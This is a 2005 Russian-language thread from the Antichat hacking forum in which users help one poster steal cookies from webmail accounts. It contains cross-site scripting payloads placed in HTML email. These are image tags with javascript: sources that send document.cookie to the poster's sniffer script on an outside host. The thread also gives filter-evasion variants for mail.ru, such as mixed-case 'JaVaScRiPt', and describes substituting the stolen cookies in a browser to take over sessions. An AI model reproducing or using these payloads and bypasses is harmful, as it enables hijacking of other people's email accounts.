ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как можно получить куки ?
  #1  
Старый 04.06.2005, 00:23
Аватар для VARVAR
VARVAR
Познающий
Регистрация: 03.06.2005
Сообщений: 39
Провел на форуме:
54724

Репутация: 0
По умолчанию Как можно получить куки ?

Запустил у себя на бесплатном хосте (hut.ru) сниффер на perl. Работает отлично - рефку присылает. Но проблема в том, что не получается пока с куками.

Понял, что для передачи куков нужно послать письмо в html формате с ява-скриптом:

<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">

В скрипте есть адресс сниффера. Потом с лога сниффера забираем файлы куки, а дальше работаем с
проксомитроном (или др. редактором куков).

Говорят, что снифер на бесплатном хостинге практически бесполезен...Так это или нет ?

Посоветуйте плиз, где у меня ошибка (можно в приват). Заранее благодарен, так как вижу, что этот вопрос интересует многих.

Последний раз редактировалось VARVAR; 04.06.2005 в 00:26..
 
Ответить с цитированием

  #2  
Старый 04.06.2005, 00:42
Аватар для PinkPanther
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию

Фильтры на скрипты, теги, метасимволы.... Поэтому и не работает...=(

Последний раз редактировалось PinkPanther; 04.06.2005 в 00:52..
 
Ответить с цитированием

  #3  
Старый 04.06.2005, 10:58
Аватар для Майор
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию

Цитата:
Говорят, что снифер на бесплатном хостинге практически бесполезен...Так это или нет ?
Почему ? раз работает, значит полезен
 
Ответить с цитированием

  #4  
Старый 04.06.2005, 18:36
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Почему? Чтото непонял, у тебя что куки скрипту не передаются
 
Ответить с цитированием

  #5  
Старый 04.06.2005, 19:14
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

может быть не работает сам XSS в твоей почте:
<img src="javascript:">

Может браузер не поддерживает функц. Image().
попробуй по-порядку
 
Ответить с цитированием

  #6  
Старый 04.06.2005, 20:23
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

но это точно не изза бесплатного хостигна. скорее всего фильтрование со стороны клиента
 
Ответить с цитированием

  #7  
Старый 04.06.2005, 21:34
Аватар для VARVAR
VARVAR
Познающий
Регистрация: 03.06.2005
Сообщений: 39
Провел на форуме:
54724

Репутация: 0
По умолчанию

PinkPanther оказался прав - ява скрипты просто блокируются. Но это можно обойти, используя шестнадцатиричные значения символов вместо javascript. Проверял на e-mail.ru.

<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">

Снифер выдал QUERY=b=b, рефка как и полагается пришла. Получается, что на e-mail.ru нет кукисов, а только одни сессии ?

На mail.ru такое дело не прокатывает. При вложении в html-код везде добавляется "X", изменяется заголовок.

<xtitle>Непонятный заголовок</xtitle>
</xhead>
<xbody>
<IMG src=xjavascript:document.images[0].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>
</xbody>
</xhtml>

Да, с бесплатным хостом все в порядке ! Разницы вроде нет платный-бесплатный.

Надо думать дальше насчет куков. Видимо надо пробовать вложения с рисунками и flash.

Последний раз редактировалось VARVAR; 04.06.2005 в 21:49..
 
Ответить с цитированием

  #8  
Старый 04.06.2005, 22:26
Аватар для Xattab
Xattab
Познающий
Регистрация: 30.05.2005
Сообщений: 38
Провел на форуме:
671877

Репутация: 4
По умолчанию

http://forum.antichat.ru/showthread.php?p=43322
Здесь Майор писал рабочий на данный момент способ обхода фильтра для mail.ru.
В твоем случае это выглядит так:
<image src=JaVaScRiPt:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>

Последний раз редактировалось Xattab; 04.06.2005 в 23:00..
 
Ответить с цитированием

  #9  
Старый 05.06.2005, 11:40
Аватар для Майор
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию

Цитата:
Сообщение от VARVAR  
Снифер выдал QUERY=b=b, рефка как и полагается пришла. Получается, что на e-mail.ru нет кукисов, а только одни сессии ?
ты прав
 
Ответить с цитированием

  #10  
Старый 07.06.2005, 02:22
Аватар для VARVAR
VARVAR
Познающий
Регистрация: 03.06.2005
Сообщений: 39
Провел на форуме:
54724

Репутация: 0
По умолчанию

Thank you Майор & Xattab !

Интересно, а кто-нибудь юзал прогу Minibrowser v2.20 для подстановки куков. Очень интересная прога ! За исключением того, что не хочет открывать папки на mail.ru. На рамблере без проблем.

В принципе и Opera рулит, но не очень удобно делать подстановку снифф-куки.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ